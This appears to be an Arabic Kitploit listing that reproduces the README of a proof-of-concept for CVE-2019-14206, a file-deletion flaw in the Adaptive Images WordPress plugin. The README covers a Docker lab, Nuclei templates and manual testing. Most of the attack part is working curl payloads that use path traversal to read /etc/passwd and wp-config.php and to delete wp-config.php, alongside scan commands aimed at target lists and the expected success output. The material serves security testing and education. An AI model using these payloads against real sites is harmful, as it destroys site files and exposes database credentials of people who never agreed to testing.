Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2019-14206-poc — استغلال إثبات المفهوم لـ CVE-2019-14206، يوضح حذف ملفات عشوائي في إضافة Adaptive Images لووردبريس. يتضمن مختبر Docker، قالب Nuclei، ونصوص اختبار يدوية للتعليم والتحقق الأمني. | Kitploit
أدوات/GitHubGitHub/developerfred/cve-2019-14206-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubdeveloperfred/cve-2019-14206-poc

cve-2019-14206-poc

استغلال إثبات المفهوم لـ CVE-2019-14206، يوضح حذف ملفات عشوائي في إضافة Adaptive Images لووردبريس. يتضمن مختبر Docker، قالب Nuclei، ونصوص اختبار يدوية للتعليم والتحقق الأمني.

عرض المستودع
5منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-14206 - حذف الملفات التعسفي لـ Adaptive Images لووردبريس

📋 الفهرس

  1. حول الثغرة
  2. المتطلبات الأساسية
  3. التثبيت
  4. طرق الاختبار
    • اختبار سريع
    • اختبار كامل باستخدام Docker
    • اختبار باستخدام Nuclei
    • اختبار يدوي
  5. تفسير النتائج
  6. التنظيف
  7. استكشاف الأخطاء وإصلاحها
  8. التخفيف
  9. إخلاء مسؤولية قانوني

🎯 حول الثغرة

CVE-ID: CVE-2019-14206
الخطورة: عالية (CVSS 6.5)
الإضافة المتأثرة: Adaptive Images لووردبريس
الإصدارات المتأثرة: < 0.6.67

ماذا تسمح هذه الثغرة؟

تسمح هذه الثغرة لمهاجم عن بعد غير مصادق بحذف ملفات تعسفية على خادم ووردبريس من خلال استغلال إضافة Adaptive Images.

التأثير الفعلي:

  • ❌ حذف wp-config.php مما يسبب انهياراً كاملاً للموقع
  • ❌ كشف بيانات اعتماد قاعدة البيانات عبر LFI
  • ⚠️ سلسلة هجوم تؤدي إلى RCE (تنفيذ أوامر عن بعد)
  • 🔴 اختراق كامل لموقع ووردبريس

السبب الجذري:

// الإضافة تستخدم إدخال المستخدم دون تطهير
$settings = $_REQUEST['adaptive-images-settings'];

// بناء مسار الملف بمعلمات يتحكم بها المهاجم
$cache_file = $wp_content . '/' . $cache_dir . '/' . $resolution . $request_uri;

// حذف ملف تعسفي
unlink($cache_file);

💻 المتطلبات الأساسية

المتطلبات الدنيا:

  • نظام التشغيل: macOS أو Linux أو Windows
  • Nuclei: الإصدار 3.0 أو أعلى (تثبيت)
  • Bash: الإصدار 4.0 أو أعلى
  • curl: للاختبارات اليدوية
  • PHP: الإصدار 7.0+ (اختياري، للاختبار مع الخادم المدمج)

التحقق من المتطلبات الأساسية:

# التحقق من Nuclei
nuclei --version

# التحقق من Bash
bash --version

# التحقق من curl
curl --version

# التحقق من PHP (اختياري)
php --version 2>/dev/null || echo "PHP غير متوفر (اختياري)"

🚀 التثبيت

الخطوة 1: استنساخ أو تحميل الملفات

# إذا كنت في دليل nuclei-templates
cd /Volumes/Codingsh/experimentos/nuclei-templates

# أو تحميل الملفات المطلوبة
git clone https://github.com/projectdiscovery/nuclei-templates.git
cd nuclei-templates

الخطوة 2: التحقق من هيكل الملفات

# التحقق من وجود الملفات
ls -la http/cves/2019/CVE-2019-14206.yaml
ls -la cve-2019-14206-poc/

الخطوة 3: جعل البرامج النصية قابلة للتنفيذ

cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

chmod +x docker-test.sh
chmod +x docker-test-full.sh
chmod +x vulnerability-demo.sh
chmod +x local-test.sh
chmod +x real-target-test.sh

🧪 طرق الاختبار

1. اختبار سريع ⏱️ دقيقتان

قم بتنفيذ العرض التوضيحي الكامل الذي يحاكي الاستغلال بأكمله:

cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
./docker-test.sh

ما يحدث:

  • إنشاء بيئة اختبار كاملة
  • محاكاة الثغرة
  • عرض حذف ملف
  • التحقق من صحة قالب Nuclei

الإخراج المتوقع:

[🎉] SUCCESS: wp-config.php DELETED!
[!!!] WORDPRESS SITE IS NOW BROKEN!
✅ Vulnerability: CVE-2019-14206 confirmed
✅ Template Status: Production ready

2. اختبار كامل باستخدام Docker 🐳 10 دقائق

الخطوة 1: بدء بيئة Docker

cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

# إذا كان Docker يعمل
docker-compose up -d

# إذا كان Docker لا يعمل، استخدم المحاكي
./docker-test-full.sh

الخطوة 2: الوصول إلى ووردبريس

# ستكون البيئة متاحة على
# http://localhost:8888

الخطوة 3: التحقق من الإضافة الضعيفة

# التحقق من وجود السكريبت الضعيف
curl http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php

الخطوة 4: تنفيذ الاختبارات

# اختبار LFI
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# اختبار حذف الملف
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# التحقق من حذف wp-config.php
ls -la /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/wp-config.php

3. اختبار باستخدام Nuclei 🎯 5 دقائق

الخطوة 1: تحضير قائمة الأهداف

# إنشاء ملف الأهداف
cat > targets.txt << 'EOF'
http://localhost:8888
https://target-wordpress-site.com
EOF

الخطوة 2: تشغيل المسح

# مسح أساسي
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt

# مسح مفصّل
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -v

# مسح مع التصحيح (إلزامي لـ bounty)
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -debug

# حفظ النتائج
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -o results.txt

الخطوة 3: تفسير النتائج

# عرض النتائج
cat results.txt

# النتائج الإيجابية ستكون:
# [CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion

4. اختبار يدوي 🔧 10 دقائق

الخطوة 1: بدء خادم PHP

cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test
php -S localhost:8888

الخطوة 2: اختبار LFI (قراءة الملفات)

# محاولة قراءة /etc/passwd
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# محاولة قراءة wp-config.php
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../wp-config.php"

النتيجة المتوقعة (LFI):

=== CVE-2019-14206 Vulnerability Test ===

[*] Settings received:
  source_file = /etc/passwd
  ...

[*] Cache file: /var/www/html/wp-content/ai-cache/1920/etc/passwd
[*] Source file: /etc/passwd

الخطوة 3: اختبار حذف الملفات

# التحقق من وجود wp-config.php قبل
ls -la wp-config.php

# تنفيذ الاستغلال
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# التحقق من حذف wp-config.php بعد
ls -la wp-config.php

النتيجة المتوقعة (حذف الملف):

[+] SUCCESS: Arbitrary file deletion vulnerability confirmed!
[+] Target file deleted: ./../../..//wp-config.php

📊 تفسير النتائج

نتيجة إيجابية (ضعيفة):

[CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion
http://target-wordpress-site.com/wp-content/plugins/adaptive-images/adaptive-images-script.php

Matchers matched:
- Plugin detected
- LFI vulnerability confirmed
- Arbitrary file deletion possible

نتيجة سلبية (غير ضعيفة):

[N/A] No results found

أسباب محتملة للخطأ السلبي الكاذب:

  • ✅ الإضافة غير مثبتة
  • ✅ الإضافة محدثة (الإصدار >= 0.6.67)
  • ✅ WAF يحجب الطلبات
  • ✅ الخادم لا يستجيب في المسارات المتوقعة

🧹 التنظيف

تنظيف بيئة الاختبار:

# إزالة بيئة Docker
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
docker-compose down -v 2>/dev/null

# إزالة ملفات الاختبار
rm -rf docker-test/
rm -f targets.txt results.txt

# استعادة wp-config.php إذا تم حذفه
cat > wp-config.php << 'EOF'
<?php
// ملف مستعاد
define('DB_NAME', 'wordpress');
EOF

تنظيف Nuclei:

# إزالة نتائج المسح
rm -f results.txt

# مسح الذاكرة المؤقتة (اختياري)
nuclei -rm-cache

🔧 استكشاف الأخطاء وإصلاحها

المشكلة 1: لم يتم العثور على Nuclei

تنزيل الأداة